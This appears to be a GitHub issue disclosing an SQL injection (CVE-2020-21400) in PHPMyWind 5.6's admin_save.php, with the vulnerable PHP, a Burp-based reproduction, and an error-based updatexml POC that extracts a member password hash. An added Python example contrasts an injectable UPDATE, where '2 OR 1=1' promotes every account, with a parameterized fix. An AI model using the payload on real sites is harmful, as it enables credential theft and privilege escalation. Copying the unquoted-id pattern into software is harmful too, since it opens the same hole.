CVE-2020-21400: i found admin/admin_save.php in PHPMyWind 5.6 has sql injection. · Issue #11 · gaozhifeng/PHPMyWind
SQL injection vulnerability in gaozhifeng PHPMyWind v.5.6 allows a remote attacker to execute arbitrary code via the id variable in the modify function.
I found a SQL injection vulnerability in the backend management system of PHPMyWind 5.6.
The relevant source code is as follows:
```php
// Modify administrator
else if($action == 'update')
{
    // The founder account's status must not be changed
    if($id == 1 and ($checkadmin != 'true' or $levelname != '1'))
    {
        ShowMsg('抱歉,不能更改创始账号状态!','-1'); // "Sorry, the founder account's status cannot be changed!"
        exit();
    }
    // Only a super administrator may change an account into a super administrator
    if($cfg_adminlevel > 1 and $levelname == 1)
    {
        ShowMsg('非法的操作,不能修改为超级管理员!', '-1'); // "Illegal operation: cannot change to super administrator!"
        exit();
    }
    if($password == '')
    {
        // $id is interpolated into the WHERE clause without quotes or escaping
        $sql = "UPDATE `$tbname` SET nickname='$nickname', question='$question', answer='$answer', levelname='$levelname', checkadmin='$checkadmin' WHERE `id`=$id";
    }
    else
    {
        $oldpwd = md5(md5($oldpwd));
        $password = md5(md5($password));
        // Same unquoted $id in the SELECT used for the old-password check
        $r = $dosql->GetOne("SELECT `password` FROM `#@__admin` WHERE `id`=$id");
        if($r['password'] != $oldpwd)
        {
            ShowMsg('抱歉,旧密码错误!','-1'); // "Sorry, the old password is wrong!"
            exit();
        }
        // Same unquoted $id in the password-changing UPDATE
        $sql = "UPDATE `$tbname` SET password='$password', nickname='$nickname', question='$question', answer='$answer', levelname='$levelname', checkadmin='$checkadmin' WHERE id=$id";
    }
    if($dosql->ExecNoneQuery($sql))
    {
        header("location:$gourl");
        exit();
    }
}
```
All three SQL statements here are vulnerable, because the variable `$id` is not protected by single quotes.
Vulnerability validation:
First, we log in to this page with a super administrator account or a site administrator account and click the modify button.
Click submit, then use Burp to intercept the request and replace the variable `$id` with the injection payload.
POC:
```sql
AND id in (char(@`’`), updatexml(1,(concat(0x7e,(select password from pmw_member limit 0,1),0x7e)),1),char(@`’`))
```
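The following is an added example, not code from PHPMyWind or from this issue. It reproduces the root cause in a self-contained form: Python over an in-memory SQLite database stands in for PHP and MySQL so that it runs offline, and the admin table name `pmw_admin` is an assumption, since the page only shows the placeholder `#@__admin`. `update_vulnerable` builds the UPDATE string the way admin_save.php does, interpolating the id unquoted, so a boolean payload such as `2 OR 1=1` turns the single-row edit into a mass update that makes every account a super administrator. `update_hardened` shows the fix a maintainer would apply: validate the id as a plain integer and bind every value as a query parameter instead of relying on quoting. The updatexml payload from the POC is MySQL-specific and is not reproduced here.

```python
import sqlite3

# Added example (not PHPMyWind code). SQLite stands in for MySQL; the table
# name pmw_admin is an assumption, the page only shows `#@__admin`.


def make_db():
    """Create a constructed sample admin table with three accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pmw_admin (id INTEGER PRIMARY KEY, nickname TEXT, "
        "levelname INTEGER, checkadmin TEXT)"
    )
    conn.executemany(
        "INSERT INTO pmw_admin VALUES (?, ?, ?, ?)",
        [
            (1, "founder", 1, "true"),   # levelname 1 = super administrator
            (2, "editor", 3, "false"),
            (3, "auditor", 3, "false"),
        ],
    )
    return conn


def update_vulnerable(conn, id_value, nickname, levelname):
    """Mirror of the page's $sql: the id is interpolated into the WHERE clause
    without quotes or escaping, so the caller controls the rest of the query.
    Returns the number of rows changed."""
    sql = (
        f"UPDATE `pmw_admin` SET nickname='{nickname}', levelname='{levelname}' "
        f"WHERE `id`={id_value}"
    )
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def update_hardened(conn, id_value, nickname, levelname):
    """Fixed version: reject anything that is not a plain integer id and bind
    every value as a parameter, so no input can alter the query structure."""
    if not str(id_value).isdigit():
        raise ValueError(f"invalid id: {id_value!r}")
    cur = conn.execute(
        "UPDATE pmw_admin SET nickname = ?, levelname = ? WHERE id = ?",
        (nickname, int(levelname), int(id_value)),
    )
    conn.commit()
    return cur.rowcount


def levels(conn):
    """(id, levelname) for every account, ordered by id."""
    return list(conn.execute("SELECT id, levelname FROM pmw_admin ORDER BY id"))


if __name__ == "__main__":
    payload = "2 OR 1=1"  # what an attacker submits in the id field
    conn = make_db()
    changed = update_vulnerable(conn, payload, "editor", 1)
    print("vulnerable:", changed, "rows changed ->", levels(conn))
    conn = make_db()
    try:
        update_hardened(conn, payload, "editor", 1)
    except ValueError as err:
        print("hardened: rejected", err, "->", levels(conn))
```

Running the block directly prints the two outcomes side by side: the vulnerable query changes all three rows, the hardened one refuses the payload and leaves the table untouched. Casting with `(int)$id` in PHP would block this particular payload too, but binding parameters (mysqli or PDO prepared statements) also covers the other interpolated fields in the same statement.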